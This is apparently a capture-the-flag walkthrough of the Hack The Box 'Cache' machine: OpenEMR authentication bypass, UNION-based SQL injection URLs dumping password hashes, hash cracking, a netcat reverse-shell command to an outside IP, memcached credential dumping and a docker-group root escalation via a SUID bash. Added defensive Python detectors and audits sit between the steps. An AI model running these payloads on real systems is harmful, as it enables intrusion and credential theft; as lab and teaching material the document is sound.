Last updated on July 4, 2021
Level : Intermediate
Task : To root the machine and collect user and root flag.
- openemr vulnerability
- SQL injection and RCE
- Privilege Escalation
We start our scanning with rustscan, and the result shows that port 22 (SSH) and port 80 (HTTP) are open.
rustscan --ulimit 5001 -a 10.129.2.219 -- -sC -sV
Now we know that port 80 serves a web page titled Cache, with links such as Home, News, Contact us, Authors and Login. The login page caught my eye, so we start digging into it.
Using these credentials we log in to the page, but there is nothing interesting there, and trying them over SSH fails as well. Digging further, on the Authors page we find something strange: the authors are also working on another project, so we add it to our hosts file and visit it.
Visiting hms.htb, we see that OpenEMR is installed, with a 2018 copyright notice. Searching the internet tells us that the 2018 release was OpenEMR 5.0.1, which has some serious vulnerabilities; you can read the report here.
After reading the vulnerability report, we first have to bypass the login page, which we can do through the Patient Portal. We go to the registration panel and, with the help of Burp Suite, modify the request and change the destination page.
Now we can see that we have made a registration request as a new user.
Change the URL in the request to the page we want to reach directly.
We have successfully bypassed the authentication of the portal.
Now it's time for the second vulnerability, SQL injection. According to the vulnerability report, the injectable page is add_edit_event_user.php:
SQL injection in add_edit_event_user.php is caused by unsanitized user input from the eid, userid, and pid parameters. Exploiting this vulnerability requires authentication to PatientPortal; however, it can be exploited without authentication when combined with the PatientPortal authentication bypass.
Having confirmed the SQL injection, it's time to use it to extract useful information, such as passwords.
First we have to find the number of columns in the query; using ORDER BY we find that there are four. Knowing the column count, the next step is to find out which of the columns is reflected in the response.
http://hms.htb/portal/add_edit_event_user.php?eid=1 order by 4
Now let's check the version first.
Next we check the database name, which turns out to be “openemr”.
Now that we know the database, we list the tables in openemr. Here we apply a filter on the table name, because there are too many tables to display on the error page; after filtering we get tables such as users, users_secure, etc.
http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(table_name),null from information_schema.tables where table_schema='openemr' and table_name like 'user%'
After getting the tables, it's time to find the columns. We tried dumping the columns of every table, but the data we need is in users_secure.
http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(column_name),null from information_schema.columns where table_name='users_secure'
The columns in the table are id, username, password, salt, last_update, etc., and two of them are my favourites: username and password.
First, dump the usernames:
http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(username),null from users_secure
Now that we know the username, dump the password hash:
http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(Password),null from users_secure
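The extraction chain above leaves a clear trail in the web server's access log. As an added example (not part of the original write-up), here is a small detector that flags column-count probes and UNION-based extraction against add_edit_event_user.php, including double URL-encoded payloads; the log lines are constructed to resemble the requests above.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Combined-log-format request line (constructed samples below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
# Tell-tale fragments of the column-count and UNION-based extraction steps.
SQLI_RE = re.compile(
    r"\b(union\s+(all\s+)?select|information_schema|group_concat|order\s+by\s+\d+)\b", re.I
)
WATCHED = {"eid", "userid", "pid"}          # parameters the advisory names as unsanitised
TARGET = "/portal/add_edit_event_user.php"

def inspect(line):
    """Return a finding dict for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m or not urlsplit(m["path"]).path.endswith(TARGET):
        return None
    hits = []
    for name, value in parse_qsl(urlsplit(m["path"]).query, keep_blank_values=True):
        # parse_qsl already decoded once; decode again to catch %2520-style double encoding.
        if name in WATCHED and SQLI_RE.search(unquote_plus(value)):
            hits.append(name)
    return {"ip": m["ip"], "ts": m["ts"], "params": hits} if hits else None

def scan(log_text):
    """Run inspect() over every line and keep only the findings."""
    return [f for f in map(inspect, log_text.splitlines()) if f]

# Constructed log lines modelled on the requests in the write-up (not a real capture).
SAMPLE_LOG = """\
10.10.14.68 - - [04/Jul/2021:12:00:00 +0000] "GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1" 200 512
10.10.14.68 - - [04/Jul/2021:12:00:05 +0000] "GET /portal/add_edit_event_user.php?eid=1+order+by+4 HTTP/1.1" 500 163
10.10.14.68 - - [04/Jul/2021:12:00:09 +0000] "GET /portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(username),null+from+users_secure HTTP/1.1" 200 700
10.10.14.68 - - [04/Jul/2021:12:00:12 +0000] "GET /portal/add_edit_event_user.php?eid=1%2520union%2520select%25201,2,3,4 HTTP/1.1" 200 700
10.10.14.68 - - [04/Jul/2021:12:00:20 +0000] "GET /index.php?page=news HTTP/1.1" 200 900
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The real fix is on the application side (parameterised queries for eid, userid and pid, and patching to a release past 5.0.1); the detector only tells you that the exploitation is happening.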
Now we have a hash, but first we have to identify its type. I use hashcat for this, and it turns out to be a bcrypt hash, so let's crack it.
sudo hashcat -m 3200 hash Desktop/HTB/rockyou.txt
We successfully crack the hash. SSH with these credentials fails, so we dig further and find an exploit (here) that requires authentication; since we now have credentials, let's give it a try.
searchsploit openemr 5.0.1
searchsploit -m 45161
After understanding the exploit, we run it; make sure to change the username and password.
python 45161.py http://hms.htb -u xxxxxxx -p xxxxxx -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.68 1234 >/tmp/f'
Now we have a shell. Early on we find some credentials for the user ash; they work, and we have our first flag.
Now it's time to go for root. Checking for services listening locally, we find something odd: port 11211, which is generally used by a Memcached server. Because it is misconfigured, we can connect to it with telnet and dump the cached data.
telnet 127.0.0.1 11211
version
stats cachedump 1 0
get user
get passwd
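The manual telnet session above is exactly what an administrator can script to audit their own cache for credential-like keys before an attacker does. As an added example (not from the original write-up), the following speaks the memcached text protocol (stats items, then stats cachedump per slab) and reports keys whose names look like secrets without fetching their values; tcp_sender is a hypothetical helper for a live server, and the fake responses are constructed.

```python
import re
import socket

# Key names that suggest a secret was cached ("user" and "passwd" appear in the write-up).
SENSITIVE_KEY = re.compile(r"user|pass|passwd|secret|token|session|key", re.I)

def list_keys(send):
    """Enumerate occupied slabs with 'stats items', then list their keys with 'stats cachedump'.
    `send(cmd)` must return the server's text response up to and including the END line."""
    slabs = []
    for line in send("stats items").splitlines():
        m = re.match(r"STAT items:(\d+):number (\d+)", line)
        if m and int(m.group(2)) > 0:
            slabs.append(int(m.group(1)))
    keys = []
    for slab in slabs:
        for line in send(f"stats cachedump {slab} 0").splitlines():
            m = re.match(r"ITEM (\S+) \[", line)
            if m:
                keys.append(m.group(1))
    return keys

def sensitive_keys(send):
    """Keys whose names look like credentials; values are deliberately never retrieved."""
    return [k for k in list_keys(send) if SENSITIVE_KEY.search(k)]

def tcp_sender(host="127.0.0.1", port=11211, timeout=2.0):
    """Transport for a live server (hypothetical helper): one TCP connection per command."""
    def send(cmd):
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(cmd.encode() + b"\r\n")
            buf = b""
            while not buf.endswith(b"END\r\n"):
                chunk = sock.recv(4096)
                if not chunk:
                    break
                buf += chunk
        return buf.decode(errors="replace")
    return send

# Constructed responses imitating the box's cache contents (not captured output).
FAKE_RESPONSES = {
    "stats items": "STAT items:1:number 4\r\nSTAT items:1:age 42\r\nEND\r\n",
    "stats cachedump 1 0": ("ITEM link [21 b; 0 s]\r\nITEM user [5 b; 0 s]\r\n"
                            "ITEM passwd [9 b; 0 s]\r\nITEM file [7 b; 0 s]\r\nEND\r\n"),
}

def fake_sender(cmd):
    return FAKE_RESPONSES.get(cmd, "END\r\n")

if __name__ == "__main__":
    print("credential-like keys:", sensitive_keys(fake_sender))   # live: sensitive_keys(tcp_sender())
```

Any hit is a finding regardless of the bind address: a cache should never hold plaintext credentials, and on a shared host every local user can reach 127.0.0.1:11211 unless SASL or a Unix socket with restricted permissions is used.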
Now we have a username and password with which we can SSH into the server, and here we find something very interesting: this user is a member of the docker group. That is a serious issue for the owner, but a jackpot for an attacker.
Let's get root-level access by abusing the docker service. First we pull an Ubuntu image and run a container with the host file system mounted into it; from an interactive shell inside the container we copy the bash binary onto the host file system and set the SUID bit and execute permission on it. You can read more about docker exploitation here.
docker images
docker pull ubuntu
docker images
docker run -it -v /:/mnt ubuntu
cd /mnt
which bash
cp /bin/bash /mnt/home/luffy/
cd /mnt/home/luffy/
chmod +xs bash
Once everything is set, we go back to the host machine, where our bash file now has the SUID bit set; running it finally gives us root on the target server.
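Both halves of this escalation are easy to audit for: docker group membership is root-equivalent, and a set-uid bash in a home directory is the artefact it leaves behind. As an added example (not part of the original write-up), the following audit parses /etc/group for docker members and flags set-uid files outside the usual system directories; collect_suid is a hypothetical live collector and the sample inputs are constructed.

```python
import os
import stat

# Directories where set-uid binaries are expected on a stock Linux system.
TRUSTED_SUID_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/", "/snap/")

def docker_group_members(group_text):
    """Parse /etc/group content and return the members of the docker group.
    Membership is root-equivalent: a member can mount / into a container, as the write-up shows."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [m for m in fields[3].split(",") if m]
    return []

def unexpected_suid(entries):
    """From (path, st_mode) pairs, return set-uid files that live outside the trusted dirs."""
    return [p for p, mode in entries
            if mode & stat.S_ISUID and not p.startswith(TRUSTED_SUID_DIRS)]

def collect_suid(root="/"):
    """Live collector (hypothetical helper): yield (path, st_mode) of set-uid regular files."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode

def audit(group_text, suid_entries):
    """Combine both checks into one report."""
    return {"docker_members": docker_group_members(group_text),
            "unexpected_suid": unexpected_suid(suid_entries)}

# Constructed inputs shaped like the box after the escalation (not captured from it).
GROUP_SAMPLE = "root:x:0:\nsudo:x:27:\ndocker:x:999:luffy\n"
SUID_SAMPLE = [("/usr/bin/sudo", 0o104755), ("/usr/bin/ls", 0o100755), ("/home/luffy/bash", 0o104755)]

if __name__ == "__main__":
    print(audit(GROUP_SAMPLE, SUID_SAMPLE))   # live: audit(open("/etc/group").read(), collect_suid())
```

Remediation is to take non-administrators out of the docker group (or run rootless Docker) and to remove any set-uid binary the audit reports outside the trusted directories.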